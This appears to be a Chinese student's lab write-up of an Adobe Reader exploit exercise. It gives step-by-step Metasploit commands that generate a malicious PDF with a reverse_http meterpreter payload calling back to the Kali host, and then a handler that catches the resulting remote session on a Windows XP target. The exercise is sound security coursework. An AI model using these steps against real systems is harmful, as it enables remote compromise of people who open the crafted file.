实验过程

  • 主机为kali的ip地址为:192.168.1.111、靶机windows xp 的ip地址为:192.168.1.110

  • 使用命令msfconsole进入控制台

  • 根据自己的需求选择攻击模块,将其载入(这里选用windows/fileformat/adobe_cooltype_sing),可以使用info命令查看模块的基本信息,以及参数要求,使用命令为 use windows/fileformat/adobe_cooltype_sing进入攻击模块

  • 设置攻击载荷payloads ,命令为set payloads windows/meterpreter/reverse_http

  • 使用命令show options来确定需要修改的参数。需要设置的参数有LHOSTLPORTFILENAME

    set LHOST 192.168.1.111
    set LPORT 5333
    set FILENAME 5333.pdf
    20145333茹翔 Exp5 Adobe阅读器漏洞攻击

  • 使用命令exploit生成5333.pdf
    20145333茹翔 Exp5 Adobe阅读器漏洞攻击

  • 其生成路径,是一个隐藏文件夹,可以打开另一个终端,使用命令cp 5333.pdf /root/5333.pdf将其复制到根目录下
    20145333茹翔 Exp5 Adobe阅读器漏洞攻击

  • 退出并重新进入msf平台
    20145333茹翔 Exp5 Adobe阅读器漏洞攻击

  • 使用命令 use exploit/multi/handler进入监听模式,设置好参数,执行exploit等待被攻击者的接听。
    20145333茹翔 Exp5 Adobe阅读器漏洞攻击

  • 连接成功
    20145333茹翔 Exp5 Adobe阅读器漏洞攻击

20145333茹翔 Exp5 Adobe阅读器漏洞攻击

相关文章:

  • 2021-07-11
  • 2021-12-04
  • 2021-12-27
  • 2021-06-07
  • 2021-07-31
  • 2021-06-07
猜你喜欢
  • 2021-10-07
  • 2021-11-11
  • 2021-09-26
  • 2021-12-06
  • 2021-09-11
  • 2021-10-11
相关资源
相似解决方案